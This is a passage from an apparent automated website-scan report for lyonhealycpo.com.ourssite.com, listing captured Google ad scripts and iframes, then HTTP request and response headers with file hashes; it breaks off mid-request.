amp;adurl=https://fittaste.com/" > < img src = "https://s0.2mdn.net/viewad/5239968/fittaste728x90a.gif"
alt = "Advertisement"
border = "0"
width = "728"
height = "90" > < /a>
                                    

#9 JavaScript::Write (size: 74, repeated: 1) - SHA256: 94f43b0f7b3645fb40be1e4663f82bda9087c1ed1d1627c1c4bfafef54bdeaeb

                                        < div class = "GoogleActiveViewClass"
id = "DfaVisibilityIdentifier_583058051" >
                                    

#10 JavaScript::Write (size: 18, repeated: 1) - SHA256: 0304f6f192da1241555759cbd47b6e2f7267f1661188f93500fb12bab9c28a87

                                        < div id = "ad_unit" >
                                    

#11 JavaScript::Write (size: 1385, repeated: 1) - SHA256: c838d594077d2f8466d0ccfa3ea2b9b32265f46a580bb10873d1fe4acd847257

                                        < iframe id = "google_ads_frame1"
name = "google_ads_frame1"
width = "900"
height = "90"
frameborder = "0"
src = "https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&amp;output=html&amp;h=90&amp;slotname=2327461989&amp;adk=3265937839&amp;adf=807048394&amp;w=900&amp;fwrn=4&amp;lmt=1518480535&amp;loeid=38893312&amp;rafmt=1&amp;format=900x90&amp;url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&amp;ea=0&amp;flash=10.0.45&amp;fwr=0&amp;resp_fmts=3&amp;wgl=0&amp;adsid=NT&amp;dt=1518480545101&amp;bpp=94&amp;fdt=100&amp;idt=258&amp;shv=r20180207&amp;cbv=r20170110&amp;saldr=aa&amp;correlator=948329139743&amp;frm=20&amp;ga_vid=889824150.1518480546&amp;ga_sid=1518480546&amp;ga_hid=521531601&amp;ga_fc=0&amp;pv=2&amp;icsg=0&amp;nhd=1&amp;dssz=0&amp;mdo=0&amp;mso=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=10&amp;u_nmime=92&amp;adx=138&amp;ady=140&amp;biw=1176&amp;bih=754&amp;abxe=1&amp;scr_x=0&amp;scr_y=0&amp;eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&amp;oid=3&amp;rx=0&amp;eae=4&amp;fc=784&amp;brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&amp;vis=0&amp;rsz=%7C%7C%7C&amp;abl=CS&amp;ppjl=u&amp;pfx=0&amp;fu=144&amp;bc=1&amp;ifi=1&amp;dtd=852"
marginwidth = "0"
marginheight = "0"
vspace = "0"
hspace = "0"
allowtransparency = "true"
scrolling = "no"
allowfullscreen = "true" > < /iframe>
                                    

#12 JavaScript::Write (size: 1372, repeated: 1) - SHA256: 04a9b3e4ed3c4d4efae75b8f00c4c4aede77e4d6ad0c23cf258c26498b46dc8a

                                        < iframe id = "google_ads_frame2"
name = "google_ads_frame2"
width = "300"
height = "250"
frameborder = "0"
src = "https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&amp;output=html&amp;h=250&amp;slotname=6757661585&amp;adk=3336137519&amp;adf=807048394&amp;w=300&amp;lmt=1518480535&amp;loeid=38893312&amp;format=300x250&amp;url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&amp;ea=0&amp;flash=10.0.45&amp;avail_w=0&amp;wgl=0&amp;adsid=NT&amp;dt=1518480546061&amp;bpp=15&amp;fdt=18&amp;idt=118&amp;shv=r20180207&amp;cbv=r20170110&amp;saldr=aa&amp;prev_fmts=900x90&amp;correlator=948329139743&amp;frm=20&amp;ga_vid=889824150.1518480546&amp;ga_sid=1518480546&amp;ga_hid=521531601&amp;ga_fc=0&amp;pv=1&amp;icsg=0&amp;nhd=1&amp;dssz=0&amp;mdo=0&amp;mso=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=10&amp;u_nmime=92&amp;adx=138&amp;ady=310&amp;biw=1176&amp;bih=754&amp;abxe=1&amp;scr_x=0&amp;scr_y=0&amp;eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&amp;oid=3&amp;rx=0&amp;eae=4&amp;fc=784&amp;brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&amp;vis=0&amp;rsz=%7C%7C%7C&amp;abl=CS&amp;ppjl=u&amp;pfx=0&amp;fu=16&amp;bc=1&amp;ifi=2&amp;dtd=135"
marginwidth = "0"
marginheight = "0"
vspace = "0"
hspace = "0"
allowtransparency = "true"
scrolling = "no"
allowfullscreen = "true" > < /iframe>
                                    

#13 JavaScript::Write (size: 1415, repeated: 1) - SHA256: bbf523774302b8a3573d2315da54f9392d3714ea572795e866c2475b7a4b48c0

                                        < iframe id = "google_ads_frame3"
name = "google_ads_frame3"
width = "900"
height = "90"
frameborder = "0"
src = "https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2222385521793316&amp;output=html&amp;h=90&amp;slotname=2187861180&amp;adk=1512129485&amp;adf=807048394&amp;w=900&amp;fwrn=4&amp;lmt=1518480535&amp;loeid=38893312&amp;rafmt=1&amp;format=900x90&amp;url=http%3A%2F%2Flyonhealycpo.com.ourssite.com%2F&amp;ea=0&amp;flash=10.0.45&amp;fwr=0&amp;resp_fmts=3&amp;wgl=0&amp;adsid=NT&amp;dt=1518480546201&amp;bpp=19&amp;fdt=42&amp;idt=343&amp;shv=r20180207&amp;cbv=r20170110&amp;saldr=aa&amp;prev_fmts=900x90%2C300x250&amp;correlator=948329139743&amp;frm=20&amp;ga_vid=889824150.1518480546&amp;ga_sid=1518480546&amp;ga_hid=521531601&amp;ga_fc=0&amp;pv=1&amp;icsg=0&amp;nhd=1&amp;dssz=0&amp;mdo=0&amp;mso=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=10&amp;u_nmime=92&amp;adx=130&amp;ady=599&amp;biw=1159&amp;bih=754&amp;abxe=1&amp;scr_x=0&amp;scr_y=0&amp;eid=38893302%2C21061122%2C191880502%2C33895413%2C188690903&amp;oid=3&amp;rx=0&amp;eae=4&amp;fc=784&amp;brdim=%2C%2C-4%2C-4%2C1176%2C0%2C1184%2C863%2C1176%2C754&amp;vis=0&amp;rsz=%7C%7C%7C&amp;abl=CS&amp;ppjl=u&amp;pfx=0&amp;fu=144&amp;bc=1&amp;ifi=3&amp;dtd=385"
marginwidth = "0"
marginheight = "0"
vspace = "0"
hspace = "0"
allowtransparency = "true"
scrolling = "no"
allowfullscreen = "true" > < /iframe>
                                    

#14 JavaScript::Write (size: 1853, repeated: 1) - SHA256: b256906bba1d24b9731d080b044e811419fd38235e75d2036b75cd2234ea9a09

                                        < script src = "https://googleads.g.doubleclick.net/dbm/ad?dbm_c=AKAmf-Bh9Z_Q3rjY2VyR7p1ZAf3osR3l3pBgb6tNpp_XHhq2PWu3Q8nla_c4Dh8hWfzi6O-sHyq3&dbm_d=AKAmf-BFNOga-jp5GGXBLvIbNhP1IW1aZyvbgz5PkOO_XD5bIX6cmcX_zPfhQOx6AvXcaPS06DAyclKggRT7pn12EK0HlijTOqnnA_xrfIy73cbwTtZxY94ieU4xiNIxu2RrrMGR_XrneIMl_wvkbBtFLLd3peij8KnvoB9gNSnMHcZObe_Yj7TsoJs3eCT8Qp3tdrfn6Vj0vFLKl5T2SNRAAg5Im0bHRwkYiIjD_WLBZzPuWalViB226l7i9L_a8KwAc7fOEeInRAsm6qYtoH4I_T3SGzNlCD7XjUDS_Mqey48KaocFHZmxnWlKl8L2DIBagZJhFSWGrW8RNqh84zdEo8K-yGgC2usgr6gU-lK0xccw1LADcWWFFSevuHlBwCzY_EjU_99a390x7Zn9jq-tXBKXKjhu0MdAF4mPf-DH-4rWz6BEEFjNlvWUFaPDmx5uq1vdEVaCL3UZ5M9KAWWvZG04yoG4Zmm2YT8TEw1Ab-KLaOOjsh2i6DxFL9QQE7zBeFXoVMUy4Y5KJE9xhLewoPBJAaq2-_7LNUFBq8Z5Xyc6QgYAfS_MuPpd8DFZnIY4FMwVXYGXkPyZLEL9H4O3-Q3eJkDkeTpOkJpicEV3K9FETnI5rG7cVGbUjE_2MWZRprxcYdt85GlTARbTlJZnTc0SceG8HPyYAOwiE-nH8WoBswAXk3yRHiB4blgJuFTtuLylPp1aM3Kgerp0QEUs-U9_K-oV1KxQE-04CDK5v8sCuPxRCDbyOu0UFwPHvRRS8LbSestdaAy-HFqmVV49K1E-jtZj0UKjUOXtNGLzESTVmFzVSEpJFURDRAV9xccQ0I28orxLoEOTQ-M9I_7uLN7VXIDCFj6KMY5wnpwoMDtFit0XsSgpEDYK-DTq2fKwJvNzgGBOVw4Pk41cnG7lvqrxtNqenxeyxlB1j7rDlfUzIlpWfmjown-hWmqFU3rBkyXaV6zNO3MVcFtOXqbMLmxJGJL-KcD7gDOfXgnHCh7Lpe3dYbBhotgOypkbNXeZm7MN0Zrx555VDGOm9iUEibNpyEPGctt6SEtCGoHxejqpqpUsJFpCsZ762Mh_3-ngvlzEQCFQK0W4Ifm_umvh0qTVH_m0O1Po6cTOyjh-Lq5d0dAMW5mn5gStjir4XG_lfGaqCr6446NnMm3IVG2LqK5Prdc9BoCJBzTY-TOqGmj_XuvqaxEzMmWpRtrttOUb31RbKgZDmIxGMprywNiZ7oXTd_5QWZqTY4N9p7-4yPm4IaxrK7h_W23c8yPaMUV4PSWDF2fQWbgOGFAPfeaTroKCSURWGq34TCb_0c9X5RAOZD1rmgJ1FUv1ylDoSMgRrcsH7D4EJ1j_17qQHX4ObRnGxsxp_cxJNoCpWCX5F5Z7UFBNmtfuvzoAnRePC_DNuazVe3cpXzcsFN9Vjp4EOnJVFy-AEXMA5wK9eqbAlLTaYMK47yL2LLEFHePN29m3GC4lJy1CKh6uw-H70IirYZfg-X_mKbNGchKORiA-6LlRlGn_CdzaCtos1Ys0eB_PLpB8k99jI04iyUIZy_jBYhXE0NJa0wnpbAfimKMXbvLymtbvR3IfrxHwv-9T_oFB8yU3amZ3&cid=CAASBORoBGo&rfl=3%2C%2Chttp%253A%252F%252Flyonhealycpo.com.ourssite.com%252F%240" > < /script>
                                    

#15 JavaScript::Write (size: 6676, repeated: 1) - SHA256: 9d2f1bb76a661fdb5e1a652534e6560d04addd160c48a4adbf112b13479870f9

                                        < style > div, ul, li {
    margin: 0;padding: 0;
}.abgc {
    display: block;height: 15 px;overflow: hidden;position: absolute;right: 17 px;top: 1 px;text - rendering: geometricPrecision;width: 15 px;z - index: 9020;
}.abgb {
    display: block;height: 15 px;width: 15 px;
}.abgc, .abgcp, .cbb {
    opacity: 0;
}.jar.abgc, .jar.abgcp, .jar.cbb {
    opacity: 1;
}.jaa.abgc, .jaa.abgcp, .jaa.cbb {
    display: none;
}.abgc {
    cursor: pointer;
}.cbb {
    cursor: pointer;height: 15 px;width: 15 px;z - index: 9020;
}.cbb svg {
    position: absolute;top: 0;right: 0;height: 15 px;width: 15 px;
}.cbb.cbbbg {
    fill - opacity: 1.0;
    fill: # ffffff;
    stroke: none;
}.cbb.cbbcross {
    stroke: #00aecd;stroke-width: 1.25;}.cbb:hover{cursor:pointer;}.cbb:hover .cbbbg {fill: # 58585 a;
}.cbb: hover.cbbcross {
    stroke: # ffffff;
}.abgb {
    position: absolute;right: 0 px;top: 0 px;
}.cbb {
    position: absolute;right: 1 px;top: 1 px;
}.abgc img {
    display: block;
}.abgc svg {
    display: block;
}.abgs {
    display: none;height: 100 % ;
}.abgl {
    text - decoration: none;
}.abgi {
    fill - opacity: 1.0;
    fill: #00aecd;stroke:none;}.abgbg{fill-opacity:1.0;fill:# ffffff;
    stroke: none;
}.abgtxt {
    fill: black;font - family: 'Arial';font - size: 100 px;overflow: visible;stroke: none;
}.abgac {
    position: fixed;left: 0 px;top: 0 px;z - index: 9100;display: none;width: 100 % ;height: 100 % ;background - color: # FAFAFA;
} < /style><div id=abgc class=abgc dir='ltr' aria-hidden="true"><div id=abgb class="abgb"></div > < div id = abgs class = abgs > < a id = abgl class = abgl href = "https://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://lyonhealycpo.com.ourssite.com/%26gl%3DNO%26hl%3Den%26ai0%3D&amp;usg=AFQjCNFLkxm6C-Frrk-90K7GSuYmnAF4VA"
target = _blank > < /a></div > < /div><div id="cbb" class="cbb" aria-hidden="true"><svg><path class="cbbbg" d="M0,0l15,0l0,15l-15,0Z"/ > < path class = "cbbcross"
d = "M3.25,3.25l8.5,8.5M11.75,3.25l-8.5,8.5" / > < /svg></div > < div id = "mute_panel"
aria - hidden = "true" > < /div><div id="abgac" class="abgac" aria-hidden="true"></div > < script > document.write('\n\x3cscript\x3evar abgp={hw:15,sw:75,hh:15,sh:15,himg:\'https://pagead2.googlesyndication.com\'+\'/pagead/images/adchoices/icon.png\',simg:\'https://pagead2.googlesyndication.com\'+\'/pagead/images/adchoices/en.png\',alt:\'AdChoices\',t:\'AdChoices\',tw:53,t2:\'\',t2w:0,tbo:0,att:\'adchoices\',ff:\'\',halign:\'right\',fe:false,iba:false,lttp:false,uic:true,uit:true,ci:\'\',icd:{\x22creatives\x22:[],\x22height\x22:90,\x22width\x22:728,\x22attribution\x22:{\x22user_feedback_data\x22:{\x22mute_icon_url\x22:\x22https://googleads.g.doubleclick.net/pagead/images/mtad/x_blue.png\x22,\x22pub_feedback_icon_url\x22:\x22https://googleads.g.doubleclick.net/pagead/images/mtad/x_blue.png\x22,\x22conversion_url\x22:\x22https://googleads.g.doubleclick.net/pagead/conversion/?ai\x3dCQ7OioiyCWvbnMpSfYs_ipNAOgNnotVCj1e3k_wbwLhABIMvw3ztgw9ykhZgYoAGg28y_A8gBCakCVaThoimYtD6oAwHIAwKqBKwBT9DNJXYfKWUjVmeAyda6iwE0rlSUf6VUqp-kQEdHmd3MnlvTuuS2UzMGUL7jhsWJzGe_EfHacaID75YUk6z8EJtgivcitp0mFPPlYFXMT9EgaR0K8W2SQbDRJ_gjNRk8m8CzyhexLEznrScmmO_dZccr89uh-EiCBkvvj01t0KZB4cNDz-DEHywGjkTZSHNLps5u0pCsyxsduEumNkHq_5tTM3oWNf5EZKYaFuAEA5AGAaAGTIAHyKSzQKgHpr4b2AcA0ggHCIBhEAEYAoAKAdgTAw\\u0026sigh\x3dB39WeTFrUss\\u0026cid\x3dCAASBORoBGo\x22,\x22close_button_token\x22:\x22Y2spVl036jsIo9Xt5P8GEPDP7p8BGNCv0D9CAEgAWABwAQ\x22,\x22interaction_conversion\x22:{\x22label\x22:\x22user_feedback_menu_interaction\x22,\x22label_instance\x22:\x22\x22,\x22include_close_button_token\x22:false},\x22survey_header\x22:\x22What was wrong with this ad?\x22,\x22back_icon_url\x22:\x22https://googleads.g.doubleclick.net/pagead/images/mtad/back_blue.png\x22,\x22mute_confirmation_header\x22:\x22Thanks for the feedback!\x22,\x22mute_confirmation_text\x22:\x22Well review this ad to improve the experience in the future.\x22,\x22pub_feedback_confirmation_header\x22:\x22Thanks for the feedback!\x22,\x22pub_feedback_confirmation_text\x22:\x22Well use your feedback to review ads on this site.\x22,\x22closing_countdown_text\x22:\x22Closing ad: %1$d\x22,\x22attribution_text\x22:\x22AdChoices\x22,\x22attribution_icon_url\x22:\x22https://googleads.g.doubleclick.net/pagead/images/mtad/ad_choices_blue.png\x22,\x22attribution_destination_url\x22:\x22https://www.google.com/url?ct\x3dabg\\u0026q\x3dhttps://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://lyonhealycpo.com.ourssite.com/%26gl%3DNO%26hl%3Den%26ai0%3D\\u0026usg\x3dAFQjCNFLkxm6C-Frrk-90K7GSuYmnAF4VA\x22,\x22ad_feedback_icon_url\x22:\x22https://googleads.g.doubleclick.net/pagead/images/mtad/x_blue.png\x22,\x22is_rtl_language\x22:false,\x22feedback_options\x22:[{\x22text\x22:\x22Report this ad\x22,\x22conversion\x22:{\x22label\x22:\x22user_feedback_menu_option\x22,\x22label_instance\x22:\x221\x22,\x22include_close_button_token\x22:true},\x22survey\x22:{\x22header\x22:\x22What was wrong with this ad?\x22,\x22options\x22:[{\x22text\x22:\x22Seen this ad multiple times\x22,\x22conversion\x22:{\x22label\x22:\x22mute_survey_option\x22,\x22label_instance\x22:\x222\x22,\x22include_close_button_token\x22:true}},{\x22text\x22:\x22Ad covered content\x22,\x22conversion\x22:{\x22label\x22:\x22mute_survey_option\x22,\x22label_instance\x22:\x223\x22,\x22include_close_button_token\x22:true}},{\x22text\x22:\x22Ad was inappropriate\x22,\x22conversion\x22:{\x22label\x22:\x22mute_survey_option\x22,\x22label_instance\x22:\x228\x22,\x22include_close_button_token\x22:true}},{\x22text\x22:\x22Not interested in this ad\x22,\x22conversion\x22:{\x22label\x22:\x22mute_survey_option\x22,\x22label_instance\x22:\x227\x22,\x22include_close_button_token\x22:true}}]},\x22undo_conversion\x22:{\x22label\x22:\x22user_feedback_undo\x22,\x22label_instance\x22:\x221\x22,\x22include_close_button_token\x22:true}}],\x22mute_panel_data\x22:{\x22adchoices_icon_url\x22:\x22https://googleads.g.doubleclick.net/pagead/images/adchoices/iconx2-000000.png\x22,\x22adchoices_button_text\x22:\x22AdChoices\x22,\x22closed_message_text\x22:\x22Ad closed by %1$s\x22,\x22enable_lightbox\x22:false,\x22google_logo_url\x22:\x22https://www.gstatic.com/images/branding/googlelogo/2x/googlelogo_dark_color_84x28dp.png\x22,\x22report_ad_button_text\x22:\x22Report this ad\x22,\x22confirmation_text\x22:\x22We\x27ll try not to show that ad again\x22,\x22see_my_google_ad_settings_text\x22:\x22See my Google ad settings\x22,\x22protocol_gstatic_host\x22:\x22https://www.gstatic.com\x22,\x22jake_mta_context\x22:\x22\x22,\x22overlay_message_text\x22:\x22Ads by %1$s\x22}}},\x22flags\x22:[{\x22name\x22:\x22jake_ui_extension\x22,\x22value\x22:\x22jake_default_ui\x22}]},opi:false,ti:false,mob:false,il:false,eaca:false,eda:false};\x3c/script\x3e'); < /script><script src="https:/ / pagead2.googlesyndication.com / pagead / js / r20180207 / r20110914 / abg.js "></script>
                                    


HTTP Transactions (72)


Request Response
                                        
                                            GET / HTTP/1.1 
Host: lyonhealycpo.com.composesite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         69.30.245.206
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Date: Tue, 13 Feb 2018 00:09:18 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: http://lyonhealycpo.com.ourssite.com/
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  UTF-8 Unicode text, with no line terminators
Size:   3
Md5:    ecaa88f7fa0bf610a5a26cf545dcd3aa
Sha1:   57218c316b6921e2cd61027a2387edc31a2d9471
Sha256: f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
                                        
                                            GET / HTTP/1.1 
Host: lyonhealycpo.com.ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         69.197.177.234
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Date: Tue, 13 Feb 2018 00:09:18 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5934
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   5934
Md5:    13295e673f3869e64ade542864eca532
Sha1:   590f640b18c4bd68e64c23946fd15691d7a0e887
Sha256: 15471690259c9d9aec996a17106dd76493cc002ff6bdb487a9b2ca4b4d9286e0
                                        
                                            GET /pagead/js/adsbygoogle.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Tue, 13 Feb 2018 00:08:55 GMT
Expires: Tue, 13 Feb 2018 00:08:55 GMT
Cache-Control: private, max-age=3600
Etag: 6502682663518856185
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 26103
X-XSS-Protection: 1; mode=block


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   26103
Md5:    6ef11d0463c07a28cd7cf2803534c33b
Sha1:   22c83cf48df58218feda2b7c44729bbbd3c43fdc
Sha256: 4b1e7c12854ebf981237b37942a10e1ea9f0324332083e81150e5e73b04cbbd4
                                        
                                            GET /s2/favicons?domain_url=sleepaidsforchildrenguide.com HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Tue, 13 Feb 2018 00:08:55 GMT
Date: Tue, 13 Feb 2018 00:08:55 GMT
Cache-Control: private, max-age=28800
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=123=hh5l40COP2D6fUapl260clEsYnDchztSdfANP3OqrOwPwLQSIxaS7VwuZWNGosel_igKnIHHcRIOT0uCXXSidU0jxNKngkHlrTCEKuYFO9BSa3DIDZcNwRqFnm1pT-Ce;Domain=.google.com;Path=/;Expires=Wed, 15-Aug-2018 00:08:55 GMT;HttpOnly


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   492
Md5:    3ca64f83fdcf25135d87e08af65e68c9
Sha1:   b82d0979d555bd137b33c15021129e06cbeea59a
Sha256: 2e30ff33270fd8687b0eb4d12652bfd967f23975f158bf8da93bece2ba4ab947
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: lyonhealycpo.com.ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         69.197.177.234
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
                                        
Date: Tue, 13 Feb 2018 00:09:20 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Fri, 02 Dec 2016 13:25:18 GMT
Etag: "25be-542acde7b8b80-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1531
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1531
Md5:    e1d8cf4a7b0ecfd4aa18fa4d96bb3acf
Sha1:   cd4c089bceb1c6b9d70756fcc45f10e65b7c88bd
Sha256: 4c256f96944e6c57e68a20992f12c515298e091512644aa377e05633b576769a
                                        
                                            GET /s2/favicons?domain_url=torussia.org HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Tue, 13 Feb 2018 00:08:56 GMT
Date: Tue, 13 Feb 2018 00:08:56 GMT
Cache-Control: private, max-age=86400
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=123=ATPRKBudSVrUYgT3vc9KQ6lPFmp-rgcva9mnni6prr1UQi98JXJJ_Q-5z001OTrUY9-MFIIdtfC21w40Wtu-o8MyVQBhdZN1K2ZyH-8u1hE67k1LHf249HUDXIKigkX2;Domain=.google.com;Path=/;Expires=Wed, 15-Aug-2018 00:08:56 GMT;HttpOnly


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGB, non-interlaced
Size:   749
Md5:    4207390e190eb7cbaa345ed2c7515bbf
Sha1:   a03572b0b19f2fd143ae5335a05d7863324baf9a
Sha256: 98cc48860f5a6a02ac16d9285ac950240450672f95ecf06b69464ecf42a875df
                                        
                                            POST /ocsp HTTP/1.1 
Host: clients1.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request
Cookie: NID=123=hh5l40COP2D6fUapl260clEsYnDchztSdfANP3OqrOwPwLQSIxaS7VwuZWNGosel_igKnIHHcRIOT0uCXXSidU0jxNKngkHlrTCEKuYFO9BSa3DIDZcNwRqFnm1pT-Ce

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 13 Feb 2018 00:08:56 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    6b502ac9c6d00eb73199986bbc77d070
Sha1:   cc71c1350973db9ae38766395755047d9da5cfbc
Sha256: c223252e36130e54631b07088826ea2a712b08fa95b7ac310f71d92c8cc40535
                                        
                                            POST / HTTP/1.1 
Host: g.symcd.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         23.52.27.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx/1.12.2
Content-Length: 1391
Content-Transfer-Encoding: binary
Cache-Control: max-age=596893, public, no-transform, must-revalidate
Last-Modified: Mon, 12 Feb 2018 21:56:01 GMT
Expires: Mon, 19 Feb 2018 21:56:01 GMT
Date: Tue, 13 Feb 2018 00:08:56 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1391
Md5:    dab664d03e303a7b1deba30189c57d23
Sha1:   1a87b2335fc304a7783b6f7ffdb5ff97367d30de
Sha256: a420898c491aa5011be91b1f128d5401a72f65f88f6db5db605abde5677fb03d
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
